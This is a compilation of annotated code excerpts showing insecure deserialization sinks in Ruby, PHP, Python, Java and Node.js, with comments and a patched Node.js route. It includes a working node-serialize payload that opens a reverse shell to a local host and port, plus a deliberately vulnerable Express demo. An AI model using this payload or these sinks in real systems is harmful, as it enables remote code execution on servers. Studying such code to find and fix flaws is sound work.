end
# Process the HTTP response handed to with_response (excerpt: the enclosing
# method and the closing `end`s are outside this listing).
with_response response do |resp|
# SECURITY: resp.body comes from the remote server and is therefore untrusted.
# YAML.load can instantiate arbitrary tagged Ruby objects (Psych made it safe by
# default only from 4.0). YAML.safe_load, which permits plain data types only,
# is the appropriate call for remote input.
owners = YAML.load resp.body
say "Owners for gem: #{name}"
# Iterate over the parsed owner entries; the loop body is not part of this excerpt.
owners.each do |owner|
// Judging by its name, validates a POSTed form for $controller; the body is
// abridged ("-- snip --") in this excerpt, so only the token handling is shown.
function _validatePost(&$controller) {
-- snip --
// NOTE(review): $controller->data is presumably the submitted form data, i.e.
// fully client-controlled -- confirm against the caller.
$check = $controller->data;
$token = urldecode($check['_Token']['fields']);
// Split "token:locked" on the first colon. strpos() returns 0 (falsy) for a
// leading colon, and $locked is assigned only inside this branch, so it stays
// unset when the branch is skipped unless the snipped code initialises it.
if (strpos($token, ':')) {
list ($token, $locked) = explode( ':', $token, 2 );
}
// SECURITY: unserialize() runs on a value taken from the request. ROT13 is an
// encoding, not an integrity check, so the sender chooses the serialized
// payload and PHP will instantiate the objects it names. Verify a keyed MAC
// over the field before decoding, or carry the data as JSON (json_decode);
// where unserialize() must remain, pass ['allowed_classes' => false] (PHP 7+).
$locked = unserialize(str_rot13($locked));
-- snip --
suffix=self._fs_transaction_suffix, dir=self._path
)
# Write the cache entry through the already-open descriptor fd (created before
# this excerpt, presumably by the temp-file call whose arguments end above).
with os.fdopen(fd, "wb") as f:
# Two pickles are written back to back: the timeout with protocol 1, then the
# value with the highest available protocol.
pickle.dump(timeout, f, 1)
pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
# Move the temporary file over the final name, then apply the configured mode.
# NOTE(review): entries are stored as pickles, so the read path (not shown)
# presumably calls pickle.load on these files; anyone able to write into the
# cache directory would then control what gets unpickled. Confirm that
# self._path and self._mode keep other local users out.
os.replace(tmp, filename)
os.chmod(filename, self._mode)
except (IOError, OSError) as exc:
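/**
 * Imports templates from an uploaded file and redirects to the template index.
 *
 * When a non-empty {@code dataFile} is supplied, its bytes are passed to
 * {@link MainUtils#toObject(byte[])}, the result is cast to a list of
 * {@code Template}, and that list is handed to {@code templateRes.deleteInBatch}
 * before each element is saved again.
 *
 * SECURITY: the uploaded bytes go through native Java deserialization before
 * any validation happens. The cast to {@code List<Template>} runs only after
 * {@code readObject()} has already built the object graph, so it does not
 * restrict which classes get instantiated. Prefer a data-only import format
 * (for example JSON mapped onto {@code Template}), or install an allow-list
 * {@code ObjectInputFilter} in the deserialization helper.
 *
 * NOTE(review): confirm that {@code @Menu(access = false, admin = true)} really
 * restricts this route to authenticated administrators; its semantics are not
 * visible here.
 *
 * @param map      model passed in by the framework (unused in this method)
 * @param request  current HTTP request
 * @param dataFile optional uploaded file holding the serialized template list
 * @return a view redirecting to the template index page
 * @throws Exception if reading or deserializing the upload fails
 */
@RequestMapping("/impsave")
@Menu(type = "admin" , subtype = "template" , access = false , admin = true)
public ModelAndView impsave(ModelMap map, HttpServletRequest request,
        @RequestParam(value = "dataFile", required = false) MultipartFile dataFile)
        throws Exception {
    if (dataFile != null && dataFile.getSize() > 0) {
        // Untrusted upload reaches ObjectInputStream.readObject() via this call.
        List<Template> templateList = (List<Template>) MainUtils.toObject(dataFile.getBytes());
        if (templateList != null && templateList.size() > 0) {
            // The uploaded list decides which rows are deleted and which are written.
            templateRes.deleteInBatch(templateList);
            for (Template template : templateList) {
                templateRes.save(template);
            }
        }
    }
    return request(super.createView("redirect:/admin/template/index.html"));
}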
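/**
 * Deserializes a Java-serialized byte array into an object.
 *
 * SECURITY: {@code ObjectInputStream.readObject()} instantiates whatever
 * classes the stream names, so this helper must only ever receive bytes the
 * application produced itself. For data that can come from a user (such as a
 * file upload), use a data-only format instead, or set an allow-list
 * {@code java.io.ObjectInputFilter} (Java 9+) on the stream before reading.
 *
 * @param data serialized bytes, as written by an {@code ObjectOutputStream}
 * @return the deserialized object graph's root
 * @throws Exception if the stream is malformed or a class cannot be resolved
 */
public static Object toObject(byte[] data) throws Exception {
    // try-with-resources closes the stream even when readObject() throws.
    try (ObjectInputStream objectInput = new ObjectInputStream(new ByteArrayInputStream(data))) {
        return objectInput.readObject();
    }
}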
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
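var app = express();
app.use(cookieParser());

// Demo route: greets the user named in the `profile` cookie, or issues a
// default cookie on the first visit.
app.get('/', function (req, res) {
  const profileCookie = req.cookies.profile;
  if (profileCookie) {
    // Buffer.from replaces the deprecated `new Buffer(...)` constructor.
    const str = Buffer.from(profileCookie, 'base64').toString();
    // SECURITY: this is the vulnerable sink the example exists to show. The
    // cookie is entirely client-controlled, and node-serialize's unserialize()
    // revives function-tagged string values by evaluating them, so a crafted
    // cookie executes code in the server process. Do not ship this pattern:
    // parse with JSON.parse and validate the expected fields instead.
    const obj = serialize.unserialize(str);
    if (obj.username) {
      res.send("Hello " + escape(obj.username));
    } else {
      // Always answer; the original left the request hanging in this case.
      res.send("Hello stranger");
    }
  } else {
    // First visit: hand out a base64-encoded default profile. The cookie is
    // neither signed nor encrypted, so the client can alter it freely.
    res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==", {
      maxAge: 900000,
      httpOnly: true
    });
    res.send("Hello stranger");
  }
});

app.listen(3000);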
// Reply sent when the request carries no `profile` cookie (first visit).
res.send("Hello stranger");
{"username":"admin","company":"kondukto","location":"cloudbank"}
// Decode the client-supplied `profile` cookie from base64 into a string.
var str = new Buffer(req.cookies.profile, 'base64').toString();
// SECURITY: untrusted-deserialization sink. The cookie value is chosen by the
// client, and node-serialize revives values tagged `_$$ND_FUNC$$_` as functions
// by evaluating their source, so a crafted cookie runs code in the server
// process. Parse with JSON.parse and validate the expected fields instead.
var obj = serialize.unserialize(str);
if (obj.username) {
// escape() (escape-html) HTML-encodes the name before it is echoed back.
res.send("Hello " + escape(obj.username));
}
{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"3443\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') {
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
const { check } = require('express-validator');
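var app = express();
app.use(cookieParser());

/**
 * Decode the base64 `profile` cookie into a minimal, validated profile.
 *
 * The cookie is parsed as plain JSON, which can only yield data and never
 * executes anything. Only the one field the page needs is kept.
 *
 * @param {unknown} rawCookie - value of `req.cookies.profile`
 * @returns {{ username: string } | null} the profile, or null when the cookie
 *   is missing, malformed, or lacks a usable username
 */
function readProfileCookie(rawCookie) {
  // cookie-parser can hand back non-string values (JSON cookies); reject them.
  if (typeof rawCookie !== 'string') {
    return null;
  }

  let parsed;
  try {
    parsed = JSON.parse(Buffer.from(rawCookie, 'base64').toString('utf8'));
  } catch (err) {
    if (err instanceof SyntaxError) {
      return null;
    }
    throw err;
  }

  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    return null;
  }
  if (typeof parsed.username !== 'string' || parsed.username.trim() === '') {
    return null;
  }
  return { username: parsed.username.trim() };
}

// Patched route. The earlier attempt wrapped the decoded string in
// express-validator's check(), but check() builds a validation middleware
// chain keyed by field name; it does not return a sanitized string, so the
// chain object itself was passed to unserialize() and echoed back. Escaping
// a serialized string would not make deserializing it safe in any case. The
// fix is to stop using node-serialize on client data altogether; the
// `node-serialize` and `express-validator` requires above are then unused.
app.get('/', function (req, res) {
  if (req.cookies.profile) {
    const profile = readProfileCookie(req.cookies.profile);
    if (profile) {
      res.send("Hello " + escape(profile.username));
    } else {
      res.send("Hello stranger");
    }
  } else {
    // The cookie is still unsigned, so the client can pick any username. If
    // the name must be trusted, use signed cookies (cookieParser(secret) with
    // `signed: true`, read via req.signedCookies) or a server-side session.
    res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==", {
      maxAge: 900000,
      httpOnly: true
    });
    res.send("Hello stranger");
  }
});

app.listen(3000);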
const { check } = require('express-validator');